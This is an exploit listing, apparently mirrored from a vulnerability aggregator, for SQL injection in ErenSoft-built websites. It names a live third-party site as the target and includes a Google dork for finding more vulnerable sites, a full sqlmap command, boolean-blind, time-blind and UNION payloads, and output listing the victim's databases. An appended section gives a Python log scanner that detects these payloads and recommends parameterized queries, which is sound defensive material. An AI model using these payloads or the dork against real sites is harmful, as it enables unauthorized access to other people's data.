ErenSoft SQL Injection

CVE: (none listed)
Category: CWE-89
Price: Unknown
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2023-07-23
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070056

Below is a copy:

ErenSoft SQL Injection
#Exploit Title: ErenSoft SQL Injection Vulnerable
#Date: 22.07.2023
#Exploit Author: EFETR
#Google Dork: intext:"Kodlama: Erensoft"
#Vendor Homepage: http://www.erensoft.com/
#Category: SQL Injection
#Tested On: Windows 10
------------------------------------------------
Target Url: http://alaaddinpalevi.com/videoseyret.php?id=95
Sqlmap Payload: ./sqlmap.py -u http://alaaddinpalevi.com/videoseyret.php?id=95 --risk=3 --level=5 --random-agent --batch --dbs
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=95 AND 9464=9464

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=95 AND (SELECT 4581 FROM (SELECT(SLEEP(5)))NyiX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=95 UNION ALL SELECT NULL,NULL,CONCAT(0x716a7a7671,0x774d78456f776471475478595372784f4e4779764b456543477161656868556a6e4c6f6f6f71654f,0x71787a7871),NULL,NULL,NULL,NULL-- -
---
available databases [2]:
[*] hdralaad_data
[*] information_schema

*********************************************************
#Telegram: @lstanbulSiber
#Instagram: @efetr.php
*********************************************************
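
For defenders, the three payload shapes in the sqlmap report above can be flagged in web server logs by checking that the `id` parameter is a plain integer. The following is an added example, not part of the original advisory: the combined log format, the sample log lines, the client addresses and the regexes are all assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format); client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jul/2023:10:00:01 +0000] "GET /videoseyret.php?id=95 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jul/2023:10:00:05 +0000] "GET /videoseyret.php?id=95%20AND%209464%3D9464 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jul/2023:10:00:11 +0000] "GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(5)))NyiX) HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jul/2023:10:00:12 +0000] "GET /videoseyret.php?id=95%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 5300',
]

# One rule per technique in the sqlmap report; the regexes are this example's own.
RULES = [
    ("union-query", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("time-based-blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("boolean-based-blind", re.compile(r"\b(and|or)\b\s+\(?\s*(\d+)\s*=\s*\2\b", re.I)),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')


def classify_id(value):
    """Return None for a plain integer id, else a label for the deviation."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return "non-numeric-id"  # anything else that is not an integer is still suspect


def scan(lines, param="id"):
    """Return (client, label, decoded value) for every request whose id is not an integer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        # parse_qs percent-decodes the value, so encoded payloads are matched in clear text
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            label = classify_id(value)
            if label:
                hits.append((client, label, value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The check keys on the decoded parameter value rather than the User-Agent, which the `--random-agent` option in the command above randomizes. On the application side the fix for CWE-89 is to bind `id` as an integer in a parameterized query.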
